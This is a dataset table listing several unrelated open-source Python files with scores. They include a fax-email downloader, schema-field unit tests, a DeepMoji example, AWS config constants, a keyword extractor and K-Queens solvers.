text
stringlengths
733
1.02M
score
float64
0
0.27
# Copyright 2014 Open vStorage NV # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Dummy volatile module """ import time import json class DummyVolatileStore(object): """ This is a dummy volatile store that makes use of a local json file """ _path = '/run/dummyvolatile.json' _storage = {} _timeout = {} @staticmethod def clean(): """ Empties the store """ import os try: os.remove(DummyVolatileStore._path) except OSError: pass def _read(self): """ Reads the local json file """ try: f = open(self._path, 'r') data = json.loads(f.read()) f.close() except IOError: data = {'t': {}, 's': {}} return data def get(self, key, default=None): """ Retrieves a certain value for a given key """ data = self._read() if key in data['t'] and data['t'][key] > time.time(): value = data['s'].get(key) if 'ovs_primarykeys_' in key: value[0] = set(value[0]) return value return default def set(self, key, value, timeout=99999999): """ Sets the value for a key to a given value """ if 'ovs_primarykeys_' in key: value[0] = list(value[0]) data = self._read() data['s'][key] = value data['t'][key] = time.time() + timeout self._save(data) def add(self, key, value, timeout=99999999): """ Adds a given key to the store, expecting the key does not exists yet """ data = self._read() if key not in data['s']: self.set(key, value, timeout) return True else: return False def delete(self, key): """ Deletes a given key from the store """ data = self._read() if key in data['s']: del data['s'][key] del data['t'][key] self._save(data) def incr(self, key, delta=1): """ Increments the value of the key, expecting it exists """ data = self._read() if key in data['s']: data['s'][key] += delta self._save(data) return True return False def _save(self, data): """ Saves the local json file """ rawdata = json.dumps(data, sort_keys=True, indent=2) f = open(self._path, 'w+') f.write(rawdata) f.close()
0
#!/usr/bin/python __author__="Rob Power" __date__ ="$26-aug-2013 18.00.00$" # # Copyright (C) Rob Power 2011-2013 # This file is part of FaxGratis/GmailFaxCheck. # # FaxGratis/GmailFaxCheck is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # FaxGratis/GmailFaxCheck is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with FaxGratis/GmailFaxCheckr. If not, see <http://www.gnu.org/licenses/>. # #------------------------------------------------------------------------------ # Filename: GmailFaxCheck.py # Program Name: GmailFaxCheck # (FaxGratis project) # https://github.com/robpower/GmailFaxCheck # Version: 1.2.1 # Author: Rob Power <dev [at] robpower.info> # Website: http://blog.robpower.info # https://github.com/robpower # https://www.gitorious.org/~robpower # Last Modified: 26/08/2013 # Description: This python script checks Gmail IMAP mail server # for the given account for incoming EuteliaVoip Faxes # and outgoing Faxator receipt. # # It first checks for EuteliaVoip Faxes under label # "$incoming_folder_check": if any Unread mails is detected, # it saves the attached fax PDF under "$archive_dir", # prints a copy and marks email as read. # # Then checks for Faxator receipts under label # "$outgoing_folder_check": if any Unread email is detected, # it saves the attached fax receipt PDF under "$receipt_dir", # prints a copy and marks email as read. # # Filename is the format: AAAA-MM-DD_HH.MM_SENDER#_originalfilename # Gmail filter must be configured to archive fax mail and move them to # "folder_check" label. # #------------------------------------------------------------------------------ # # import getopt import getpass import os import sys import datetime import imaplib import email import email.Errors import email.Header import email.Message import email.Utils from time import strftime import shutil import subprocess from ConfigParser import SafeConfigParser #from time import sleep Usage = """Usage: %s --user <user> --password <password> --frequency <polling frequency> <imap-server> --user Provide <user> for authentication on <imap-server> --password Password for the given user Example: attdownload.py --user username --password password """ # Loads settings from "settings.conf" file cur_file = os.path.abspath(__file__) cur_dir = os.path.dirname(cur_file) settings = SafeConfigParser() settings.read(os.path.join(cur_dir,'settings.conf')) # ARCHIVE AttachDir = settings.get('archive','AttachDir') # Attachment Temporary Directory Path ReceivedArchiveDir = settings.get('archive','ReceivedArchiveDir') ReceiptsArchiveDir = settings.get('archive','ReceiptsArchiveDir') # GMAIL incoming_folder_check = settings.get('gmail','incoming_folder_check') receipts_folder_check = settings.get('gmail','receipts_folder_check') #Faxator Receipts Gmail Label User = settings.get('gmail','User') # IMAP4 user Password = settings.get('gmail','Password') # User password # EXTRA DeleteMessages = settings.getint('extra','DeleteMessages') SaveAttachments = settings.getint('extra','SaveAttachments') # Save all attachments found Frequency = None #settings.get('extra','Frequency') # Mail server polling frequency exists = settings.getint('extra','exists') name = settings.getint('extra','name') set_read = settings.getint('extra','set_read') # Put 1 for normal use, 0 for test purpose (does not mark email at end) DEBUG = settings.getint('extra','DEBUG') # Put 1 for debug output def usage(reason=''): sys.stdout.flush() if reason: sys.stderr.write('\t%s\n\n' % reason) head, tail = os.path.split(sys.argv[0]) sys.stderr.write(Usage % tail) sys.exit(1) def args(): try: optlist, args = getopt.getopt(sys.argv[1:], '?',['user=', 'password=']) except getopt.error, val: usage(val) global SaveAttachments global User global Password global Frequency for opt,val in optlist: if opt == '--user': User = val elif opt == '--password': Password = val else: usage() if len(args) != 1: usage() return args[0] def write_file(filename, data): fullpath = os.path.join(AttachDir, filename) fd = open(fullpath, "wb") fd.write(data) fd.close() def archive_file(filename, status): if status == 'RECEIVED': shutil.copy(os.path.join(AttachDir, filename), os.path.join(ReceivedArchiveDir, filename)) # Copies the file to received archive folder elif status == 'SENT' or status == 'NOT_SENT' or status == 'CONVERTED' or status == 'Unknown': shutil.copy(os.path.join(AttachDir, filename), os.path.join(ReceiptsArchiveDir, filename)) # Copies the file to receipts archive folder def print_file(filename,dir): subprocess.Popen(['lpr', os.path.join(dir, filename)]) # Launches Fax Printing os.remove(os.path.join(AttachDir, filename)) # Remove the file from temp directory def gen_filename(name, mtyp, number, date, status): """ """ timepart = date.strftime('%Y-%m-%d_%H.%M') file = email.Header.decode_header(name)[0][0] file = os.path.basename(file) path = timepart + '_' + number + '_' + status + '_' + file return path def error(reason): sys.stderr.write('%s\n' % reason) sys.exit(1) def walk_parts(msg, number, date, count, msgnum, status): for part in msg.walk(): if part.is_multipart(): if DEBUG == 1: print "Found header part: Ignoring..." continue dtypes = part.get_params(None, 'Content-Disposition') if not dtypes: if part.get_content_type() == 'text/plain': if DEBUG == 1: print "Found plaintext part: Ignoring..." continue if part.get_content_type() == 'text/html' : if DEBUG == 1: print "Found HTML part: Ignoring..." continue # if DEBUG == 1: # print "Found possible attachment [Type: " + part.get_content_type + "]: Processing" # # # ctypes = part.get_params() # if not ctypes: # if DEBUG == 1: # print "No CTypes" # continue # for key,val in ctypes: # if DEBUG == 1: # print "Key: " + key # print "Value: " + val # if key.lower() == 'name': # filename = gen_filename(val, part.get_content_type(), number, date, status) # print "Filename: " + filename # break # # else: # if DEBUG == 1: # print "Found :" + part.get_content_type() # print "CTypes:" + ctypes.length() # continue else: if DEBUG == 1: print "Found possible attachment [Type: " + part.get_content_type() + "]: Processing..." attachment,filename = None,None for key,val in dtypes: key = key.lower() if key == 'filename': filename = val if DEBUG == 1: print "[Filename: " + filename + "]" if key == 'attachment' or key == 'inline': attachment = 1 if DEBUG ==1: print "[Attach. type: " + key + "]" else: if DEBUG == 1: print "Key: " + key if not attachment: continue filename = gen_filename(filename, part.get_content_type(), number, date, status) try: data = part.get_payload(decode=1) except: typ, val = sys.exc_info()[:2] warn("Message %s attachment decode error: %s for %s ``%s''" % (msgnum, str(val), part.get_content_type(), filename)) continue if not data: warn("Could not decode attachment %s for %s" % (part.get_content_type(), filename)) continue if type(data) is type(msg): count = walk_parts(data, number, date, count, msgnum) continue if SaveAttachments: exists = "0" try: #Check if its already there if not os.path.isfile(os.path.join(AttachDir, filename)) : exists = "1" if exists == "1": write_file(filename, data) # Writes file to temp dir (AttachDir) if status == 'RECEIVED': if not os.path.isfile(os.path.join(ReceivedArchiveDir, filename)): archive_file(filename, status) print_file(filename,ReceivedArchiveDir) print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Printed Fax " + filename.split('_')[-1] + " from " + number + " received on " + date.strftime('%Y/%m/%d - %H:%M:%S') print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Filename: " + filename print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: ---" elif status == 'SENT' or status == 'NOT_SENT' or status == 'CONVERTED' or status == 'Unknown': if not os.path.isfile(os.path.join(ReceiptsArchiveDir, filename)): archive_file(filename, status) print_file(filename, ReceiptsArchiveDir) print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Printed Fax Receipt " + filename.split('_')[-1] + ": fax to " + number + " sent on " + date.strftime('%Y/%m/%d - %H:%M:%S') print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: Filename: " + filename + '\tResult: ' +status print "[" + strftime('%Y-%m-%d %H:%M:%S') + "]: ---" except IOError, val: error('Could not create "%s": %s' % (filename, str(val))) count += 1 return count def process_message(text, msgnum,folder_to_check): try: msg = email.message_from_string(text) except email.Errors.MessageError, val: warn("Message %s parse error: %s" % (msgnum, str(val))) return text date_string ='' + msg["Date"] date_string = date_string.split(', ', 1)[1] # Strips out Weekday date_string = date_string.split(' +', 1)[0] # Strips out UTC date = datetime.datetime.strptime(date_string, '%d %b %Y %H:%M:%S') # Decode datetime from string number = msg["Subject"] if folder_to_check == incoming_folder_check: number = number.split('numero ')[-1] status = 'RECEIVED' elif folder_to_check == receipts_folder_check: if 'OK' in number: number = number.split('OK ')[-1] status = 'SENT' elif 'ERRATA' in number: number = number.split('ERRATA ')[-1] status = 'NOT_SENT' elif 'CONVERSIONE' in number: number = number.splt('CONVERSIONE ')[-1] status = 'CONVERTED' else: number = 0000000000 status = 'Unknown' attachments_found = walk_parts(msg, number, date, 0, msgnum, status) if attachments_found: if DEBUG == 1: print "Attachments found: %d" % attachments_found return '' else: if DEBUG == 1: print "No attachments found" return None def read_messages(fd): data = []; app = data.append for line in fd: if line[:5] == 'From ' and data: yield ''.join(data) data[:] = [] app(line) if data: yield ''.join(data) def process_server(host,folder_to_check): global DeleteAttachments try: mbox = imaplib.IMAP4_SSL(host) except: typ,val = sys.exc_info()[:2] error('Could not connect to IMAP server "%s": %s' % (host, str(val))) if DEBUG==1: print mbox if User or mbox.state != 'AUTH': user = User or getpass.getuser() if Password == "": pasw = getpass.getpass("Please enter password for %s on %s: " % (user, host)) else: pasw = Password try: typ,dat = mbox.login(user, pasw) except: typ,dat = sys.exc_info()[:2] if typ != 'OK': error('Could not open INBOX for "%s" on "%s": %s' % (user, host, str(dat))) if DEBUG == 1: print "Selecting Folder " + folder_to_check sel_response = mbox.select(folder_to_check) #mbox.select(readonly=(DeleteMessages)) if DEBUG == 1: print sel_response typ, dat = mbox.search(None, "UNSEEN") if DEBUG == 1: print typ, dat #mbox.create("DownloadedMails") #archiveme = [] for num in dat[0].split(): typ, dat = mbox.fetch(num, "(BODY.PEEK[])") if typ != 'OK': error(dat[-1]) message = dat[0][1] if process_message(message, num,folder_to_check) == '': if set_read == 1: mbox.store(num, '+FLAGS', '\\Seen') # Mark Email as Read # archiveme.append(num) #if archiveme == []: # print "\n" # print "No mails with attachment found in INBOX" #archiveme.sort() #for number in archiveme: # mbox.copy(num, 'DownloadedMails') # mbox.store(num, '+FLAGS', '\\Seen') # Mark Email as Read #mbox.expunge() mbox.close() mbox.logout() process_server('imap.gmail.com',incoming_folder_check) process_server('imap.gmail.com',receipts_folder_check)
0.029855
# Copyright 2012 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Unit tests for common/schema_fields.py.""" __author__ = 'John Orr (jorr@google.com)' import json import unittest from common import schema_fields def remove_whitespace(s): return ''.join(s.split()) class BaseFieldTests(unittest.TestCase): """Base class for the tests on a schema field.""" def assert_json_schema_value(self, expected, field): self.assertEquals( remove_whitespace(expected), remove_whitespace(json.dumps(field.get_json_schema_dict()))) def assert_schema_dict_value(self, expected, field): self.assertEquals( remove_whitespace(expected), remove_whitespace(json.dumps(field._get_schema_dict([])))) class SchemaFieldTests(BaseFieldTests): """Unit tests for common.schema_fields.SchemaField.""" def test_simple_field(self): field = schema_fields.SchemaField('aName', 'aLabel', 'aType') expected = '{"type":"aType"}' self.assert_json_schema_value(expected, field) expected = '[[["_inputex"], {"label": "aLabel"}]]' self.assert_schema_dict_value(expected, field) self.assertEquals('aName', field.name) def test_extra_schema_dict(self): field = schema_fields.SchemaField( 'aName', 'aLabel', 'aType', extra_schema_dict_values={'a': 'A', 'b': 'B'}) expected = '[[["_inputex"], {"a": "A", "b": "B", "label": "aLabel"}]]' self.assert_schema_dict_value(expected, field) def test_uneditable_field(self): field = schema_fields.SchemaField( 'aName', 'aLabel', 'aType', editable=False) expected = '{"type":"aType"}' self.assert_json_schema_value(expected, field) expected = ('[[["_inputex"], {"_type": "uneditable", ' '"label": "aLabel"}]]') self.assert_schema_dict_value(expected, field) self.assertEquals('aName', field.name) def test_hidden_field(self): field = schema_fields.SchemaField('aName', 'aLabel', 'aType', hidden=True) expected = '{"type":"aType"}' self.assert_json_schema_value(expected, field) expected = '[[["_inputex"], {"_type": "hidden", "label": "aLabel"}]]' self.assert_schema_dict_value(expected, field) self.assertEquals('aName', field.name) class FieldArrayTests(BaseFieldTests): """Unit tests for common.schema_fields.FieldArray.""" def test_field_array_with_simple_members(self): array = schema_fields.FieldArray( 'aName', 'aLabel', item_type=schema_fields.SchemaField( 'unusedName', 'field_label', 'aType')) expected = """ { "items": {"type": "aType"}, "type": "array" }""" self.assert_json_schema_value(expected, array) expected = """ [ [["_inputex"],{"label":"aLabel"}], [["items","_inputex"],{"label":"field_label"}] ] """ self.assert_schema_dict_value(expected, array) def test_field_array_with_object_members(self): object_type = schema_fields.FieldRegistry('object_title') object_type.add_property(schema_fields.SchemaField( 'prop_name', 'prop_label', 'prop_type')) field = schema_fields.FieldArray( 'aName', 'aLabel', item_type=object_type) expected = """ { "items": { "type": "object", "id": "object_title", "properties": { "prop_name": {"type":"prop_type"} } }, "type":"array"} """ self.assert_json_schema_value(expected, field) expected = """ [ [["_inputex"],{"label":"aLabel"}], [["items","title"],"object_title"], [["items","properties","prop_name","_inputex"],{"label":"prop_label"}] ] """ self.assert_schema_dict_value(expected, field) def test_extra_schema_dict(self): array = schema_fields.FieldArray( 'aName', 'aLabel', item_type=schema_fields.SchemaField( 'unusedName', 'field_label', 'aType'), extra_schema_dict_values={'a': 'A', 'b': 'B'}) expected = """ [ [["_inputex"],{"a":"A","b":"B","label":"aLabel"}], [["items","_inputex"],{"label":"field_label"}]] """ self.assert_schema_dict_value(expected, array) class FieldRegistryTests(BaseFieldTests): """Unit tests for common.schema_fields.FieldRegistry.""" def test_single_property(self): reg = schema_fields.FieldRegistry( 'registry_name', 'registry_description') reg.add_property(schema_fields.SchemaField( 'field_name', 'field_label', 'property_type', description='property_description')) expected = """ { "properties": { "field_name": { "type": "property_type", "description": "property_description" } }, "type": "object", "id": "registry_name", "description": "registry_description" }""" self.assert_json_schema_value(expected, reg) expected = """ [ [["title"], "registry_name"], [["properties","field_name","_inputex"], { "description": "property_description", "label":"field_label" }] ] """ self.assert_schema_dict_value(expected, reg) def test_single_property_with_select_data(self): reg = schema_fields.FieldRegistry( 'registry_name', 'registry_description') reg.add_property(schema_fields.SchemaField( 'field_name', 'field_label', 'string', select_data=[('a', 'A'), ('b', 'B')])) expected = """ { "properties": { "field_name": { "type": "string" } }, "type": "object", "id": "registry_name", "description": "registry_description" }""" self.assert_json_schema_value(expected, reg) expected = """ [ [["title"],"registry_name"], [["properties","field_name","_inputex"],{ "_type": "select", "choices":[ {"value": "a", "label": "A"}, {"value": "b","label": "B"}], "label":"field_label" }] ] """ self.assert_schema_dict_value(expected, reg) def test_select_data_values_retain_boolean_and_numeric_type_in_json(self): reg = schema_fields.FieldRegistry( 'registry_name', 'registry_description') reg.add_property(schema_fields.SchemaField( 'field_name', 'field_label', 'string', select_data=[(True, 'A'), (12, 'B'), ('c', 'C')])) expected = """ [ [["title"],"registry_name"], [["properties","field_name","_inputex"],{ "_type": "select", "choices":[ {"value": true, "label": "A"}, {"value": 12,"label": "B"}, {"value": "c","label": "C"}], "label":"field_label" }] ] """ self.assert_schema_dict_value(expected, reg) def test_object_with_array_property(self): reg = schema_fields.FieldRegistry( 'registry_name', 'registry_description') reg.add_property(schema_fields.SchemaField( 'field_name', 'field_label', 'field_type', description='field_description')) reg.add_property(schema_fields.FieldArray( 'array_name', 'array_label', item_type=schema_fields.SchemaField( 'unusedName', 'unusedLabel', 'aType'))) expected = """ { "properties": { "field_name": { "type": "field_type", "description": "field_description" }, "array_name": { "items": {"type": "aType"}, "type":"array" } }, "type": "object", "id": "registry_name", "description": "registry_description" } """ self.assert_json_schema_value(expected, reg) def test_extra_schema_dict(self): reg = schema_fields.FieldRegistry( 'aName', 'aLabel', extra_schema_dict_values={'a': 'A', 'b': 'B'}) expected = """ [ [["title"], "aName"], [["_inputex"], {"a": "A", "b": "B"}]] """ self.assert_schema_dict_value(expected, reg) def test_mc_question_schema(self): """The multiple choice question schema is a good end-to-end example.""" mc_question = schema_fields.FieldRegistry( 'MC Question', extra_schema_dict_values={'className': 'mc-question'}) mc_question.add_property( schema_fields.SchemaField('question', 'Question', 'string')) choice_type = schema_fields.FieldRegistry( 'choice', extra_schema_dict_values={'className': 'mc-choice'}) choice_type.add_property( schema_fields.SchemaField('text', 'Text', 'string')) choice_type.add_property( schema_fields.SchemaField('score', 'Score', 'string')) choice_type.add_property( schema_fields.SchemaField('feedback', 'Feedback', 'string')) choices_array = schema_fields.FieldArray( 'choices', 'Choices', item_type=choice_type) mc_question.add_property(choices_array) expected = """ { "type":"object", "id":"MCQuestion", "properties":{ "question":{"type":"string"}, "choices":{ "items":{ "type":"object", "id":"choice", "properties":{ "text":{"type":"string"}, "score":{"type":"string"}, "feedback":{"type":"string"} } }, "type":"array" } } } """ self.assert_json_schema_value(expected, mc_question) expected = """ [ [["title"],"MCQuestion"], [["_inputex"],{"className":"mc-question"}], [["properties","question","_inputex"],{"label":"Question"}], [["properties","choices","_inputex"],{"label":"Choices"}], [["properties","choices","items","title"],"choice"], [["properties","choices","items","_inputex"],{"className":"mc-choice"}], [["properties","choices","items","properties","text","_inputex"],{ "label":"Text" }], [["properties","choices","items","properties","score","_inputex"],{ "label":"Score" }], [["properties","choices","items","properties","feedback","_inputex"],{ "label":"Feedback" }] ] """ self.assert_schema_dict_value(expected, mc_question)
0
# -*- coding: utf-8 -*- """ Use DeepMoji to score texts for emoji distribution. The resulting emoji ids (0-63) correspond to the mapping in emoji_overview.png file at the root of the DeepMoji repo. Writes the result to a csv file. """ from __future__ import print_function, division import example_helper import json import csv import numpy as np from deepmoji.sentence_tokenizer import SentenceTokenizer from deepmoji.model_def import deepmoji_emojis from deepmoji.global_variables import PRETRAINED_PATH, VOCAB_PATH OUTPUT_PATH = 'test_sentences.csv' TEST_SENTENCES = [u'I love mom\'s cooking', u'I love how you never reply back..', u'I love cruising with my homies', u'I love messing with yo mind!!', u'I love you and now you\'re just gone..', u'This is shit', u'This is the shit'] def top_elements(array, k): ind = np.argpartition(array, -k)[-k:] return ind[np.argsort(array[ind])][::-1] maxlen = 30 batch_size = 32 print('Tokenizing using dictionary from {}'.format(VOCAB_PATH)) with open(VOCAB_PATH, 'r') as f: vocabulary = json.load(f) st = SentenceTokenizer(vocabulary, maxlen) tokenized, _, _ = st.tokenize_sentences(TEST_SENTENCES) print('Loading model from {}.'.format(PRETRAINED_PATH)) model = deepmoji_emojis(maxlen, PRETRAINED_PATH) model.summary() print('Running predictions.') prob = model.predict(tokenized) # Find top emojis for each sentence. Emoji ids (0-63) # correspond to the mapping in emoji_overview.png # at the root of the DeepMoji repo. print('Writing results to {}'.format(OUTPUT_PATH)) scores = [] for i, t in enumerate(TEST_SENTENCES): t_tokens = tokenized[i] t_score = [t] t_prob = prob[i] ind_top = top_elements(t_prob, 5) t_score.append(sum(t_prob[ind_top])) t_score.extend(ind_top) t_score.extend([t_prob[ind] for ind in ind_top]) scores.append(t_score) print(t_score) with open(OUTPUT_PATH, 'wb') as csvfile: writer = csv.writer(csvfile, delimiter=',', lineterminator='\n') writer.writerow(['Text', 'Top5%', 'Emoji_1', 'Emoji_2', 'Emoji_3', 'Emoji_4', 'Emoji_5', 'Pct_1', 'Pct_2', 'Pct_3', 'Pct_4', 'Pct_5']) for i, row in enumerate(scores): try: writer.writerow(row) except Exception: print("Exception at row {}!".format(i))
0
from base import Task from common import phases from common.tasks import apt class AddUnattendedUpgradesPackage(Task): description = 'Adding `unattended-upgrades\' to the image packages' phase = phases.preparation predecessors = [apt.AddDefaultSources] @classmethod def run(cls, info): info.packages.add('unattended-upgrades') class EnablePeriodicUpgrades(Task): description = 'Writing the periodic upgrades apt config file' phase = phases.system_modification @classmethod def run(cls, info): import os.path periodic_path = os.path.join(info.root, 'etc/apt/apt.conf.d/02periodic') update_interval = info.manifest.plugins['unattended_upgrades']['update_interval'] download_interval = info.manifest.plugins['unattended_upgrades']['download_interval'] upgrade_interval = info.manifest.plugins['unattended_upgrades']['upgrade_interval'] with open(periodic_path, 'w') as periodic: periodic.write(('// Enable the update/upgrade script (0=disable)\n' 'APT::Periodic::Enable "1";\n\n' '// Do "apt-get update" automatically every n-days (0=disable)\n' 'APT::Periodic::Update-Package-Lists "{update_interval}";\n\n' '// Do "apt-get upgrade --download-only" every n-days (0=disable)\n' 'APT::Periodic::Download-Upgradeable-Packages "{download_interval}";\n\n' '// Run the "unattended-upgrade" security upgrade script\n' '// every n-days (0=disabled)\n' '// Requires the package "unattended-upgrades" and will write\n' '// a log in /var/log/unattended-upgrades\n' 'APT::Periodic::Unattended-Upgrade "{upgrade_interval}";\n' .format(update_interval=update_interval, download_interval=download_interval, upgrade_interval=upgrade_interval)))
0.026535
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://aws.amazon.com/apache2.0/ # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. class namespaces(object): AUTOSCALING = 'aws:autoscaling:asg' COMMAND = 'aws:elasticbeanstalk:command' RDS = 'aws:rds:dbinstance' ENVIRONMENT = 'aws:elasticbeanstalk:environment' HEALTH_CHECK = 'aws:elb:healthcheck' HEALTH_SYSTEM = 'aws:elasticbeanstalk:healthreporting:system' LAUNCH_CONFIGURATION = 'aws:autoscaling:launchconfiguration' LOAD_BALANCER = 'aws:elb:loadbalancer' ELB_POLICIES = 'aws:elb:policies' ROLLING_UPDATES = 'aws:autoscaling:updatepolicy:rollingupdate' VPC = 'aws:ec2:vpc' class option_names(object): BATCH_SIZE = 'BatchSize' BATCH_SIZE_TYPE = 'BatchSizeType' CONNECTION_DRAINING = 'ConnectionDrainingEnabled' CROSS_ZONE = 'CrossZone' DB_DELETION_POLICY = 'DBDeletionPolicy' DB_ENGINE = 'DBEngine' DB_ENGINE_VERSION = 'DBEngineVersion' DB_INSTANCE = 'DBInstanceClass' DB_PASSWORD = 'DBPassword' DB_STORAGE_SIZE = 'DBAllocatedStorage' DB_SUBNETS = 'DBSubnets' DB_USER = 'DBUser' EC2_KEY_NAME = 'EC2KeyName' ELB_SCHEME = 'ELBScheme' ELB_SUBNETS = 'ELBSubnets' ENVIRONMENT_TYPE = 'EnvironmentType' IAM_INSTANCE_PROFILE = 'IamInstanceProfile' INSTANCE_TYPE = 'InstanceType' INTERVAL = 'Interval' LOAD_BALANCER_HTTP_PORT = 'LoadBalancerHTTPPort' LOAD_BALANCER_HTTPS_PORT = 'LoadBalancerHTTPSPort' MAX_SIZE = 'MaxSize' MIN_SIZE = 'MinSize' PUBLIC_IP = 'AssociatePublicIpAddress' ROLLING_UPDATE_ENABLED = 'RollingUpdateEnabled' ROLLING_UPDATE_TYPE = 'RollingUpdateType' SECURITY_GROUPS = 'SecurityGroups' SERVICE_ROLE = 'ServiceRole' SUBNETS = 'Subnets' SSL_CERT_ID = 'SSLCertificateId' SYSTEM_TYPE = 'SystemType' VPC_ID = 'VPCId'
0
#!/usr/bin/env python3 import argparse import urllib.request import os import csv import urllib.request import re from bs4 import BeautifulSoup, Comment import textrazor textrazor.api_key = open('textrazor.token', 'r').readline() client = textrazor.TextRazor(extractors=["topics"]) def read_urls(filename): with open(filename) as fd: reader = csv.DictReader(fd) for row in reader: yield row['url'] def fetch_page(url): if not url.startswith('http'): url = 'http://{}'.format(url) try: page = urllib.request.urlopen(url) except Exception as ex: print('ERROR: {}'.format(ex)) else: return page.read() def visible(element): if element.parent.name in ['style', 'script', '[document]', 'head', 'title']: return False if re.match('\s<!--.*-->\s', str(element)): return False return True import unicodedata, re all_chars = (chr(i) for i in range(0x110000)) control_chars = ''.join(c for c in all_chars if unicodedata.category(c) == 'Cc') reg_control_char = re.compile('[%s]' % re.escape(control_chars)) def extract_meta(html): data = {} soup = BeautifulSoup(html, 'html.parser') title = soup.head.title.text data['title'] = title keywords = soup.head.find('meta', attrs={'name': 'keywords'}) data['keywords'] = (keywords or {'content': ''})['content'] description = soup.head.find('meta', attrs={'name': 'description'}) data['description'] = (description or {}).get('content', '') print(data['title']) print(data['description']) print(data['keywords']) elements = soup.findAll(string=lambda x:x and not isinstance(x, Comment)) # take all elements containing text, excluding Comment elements = filter(visible, elements) # filter out script, css, comment, raw data, ... elements = filter(lambda x: len(x) > 3, elements) # filter out small texts texts = map(lambda x: re.sub(r'(.)\1+', r'\1\1', x.string), elements) # remove duplicated characters in texts texts = set(texts) # remove duplicate texts = map(lambda x: reg_control_char.sub('', x), texts) # remove non printable chars texts = sorted(texts, key=lambda a: len(a), reverse=True) # sort by lenght data['texts'] = [] total_length = sum([len(txt) for txt in texts]) cumul_length = 0 for txt in texts: cumul_length += len(txt) weight = cumul_length * 100 / total_length if True or weight < 60: data['texts'].append(txt) # print(round(weight, 1), repr(txt)[:220]) data['texts'] = '. '.join(data['texts']) # client.set_cleanup_mode('cleanHTML') # client.set_cleanup_return_cleaned(True) # text = str(soup) client.set_cleanup_mode('raw') text = '{title}. {description}. {keywords}. {texts}'.format(**data) response = client.analyze(text) print(response.ok, response.message, response.error) print('LANG', response.language) print('RAW', response.raw_text) print('CLEAN', response.cleaned_text) print('TOPICS') for topic in response.topics(): if topic.score < 0.95: break print(topic.score, topic.label) #, topic.wikipedia_link, topic.wikidata_id) return data def meta_keywords(meta): texts = meta['texts'] # meta['keywords'] = if __name__ == '__main__': parser = argparse.ArgumentParser(description='extract keywords from urls') parser.add_argument('-i', '--input', metavar='in', type=str, help='input file in CVS format', required=True) parser.add_argument('-o', '--output', metavar='out', type=str, help='output file in CVS format', default='<input>-keywords.cvs') args = parser.parse_args() if args.output == '<input>-keywords.cvs': args.output = '{}-keywords.cvs'.format(os.path.splitext(args.input)[0]) data = {} for url in read_urls(args.input): if url.startswith('#'): continue print('fetching url {}'.format(url)) html = fetch_page(url) if html == None: continue meta_raw = extract_meta(html) meta = meta_keywords(meta_raw) print(meta)
0.027841
# -*- coding: utf-8 -*- from LocalSearchGames.min_conflicts_game import MinConflictsGame from LocalSearchGames.simulated_annealing_game import SimulatedAnnealingGame from LocalSearchGames.state_manager import StateManager from LocalSearchGames.game_levels import GameLevel from LocalSearchGames.constraints import Constraint def queen_not_under_attack(state, list_vars): var1, var2 = list_vars queen_i = (var1, state[var1]) queen_j = (var2, state[var2]) return queen_j[1] not in ( queen_i[1], queen_i[1] + abs(queen_i[0] - queen_j[0]), queen_i[1] - abs(queen_i[0] - queen_j[0]) ) class KQueensManager(StateManager): """ State manager for a K-Queens game """ def __init__(self): super(KQueensManager, self).__init__() self.K = 0 def __set_constraints(self): self.constraints = [] for i in xrange(self.K): for j in xrange(i + 1, self.K): self.constraints.append( Constraint((i, j), queen_not_under_attack) ) def build_new_game(self, level): if level == GameLevel.EASY: self.K = 8 elif level == GameLevel.MEDIUM: self.K = 25 else: self.K = 1000 domain = xrange(self.K) self.vars = {i: domain for i in xrange(self.K)} self.__set_constraints() def __str__(self): """ Returns a representation of the current state as a string """ _str = "" _str = "-" * (4 * self.K) + "\n" for i in xrange(self.K): for j in xrange(self.K): if self.state[i] == j: _str += " Q |" else: _str += " |" _str += "\n" _str += "-" * (4 * self.K) return _str class KQueensMC(MinConflictsGame): """ K-Queens game based on min conflicts algorithm """ def __init__(self): super(KQueensMC, self).__init__() self.state_manager = KQueensManager() class KQueensSA(SimulatedAnnealingGame): """ K-Queens game based on simulated annealing algorithm """ def __init__(self): super(KQueensSA, self).__init__() self.state_manager = KQueensManager()
0
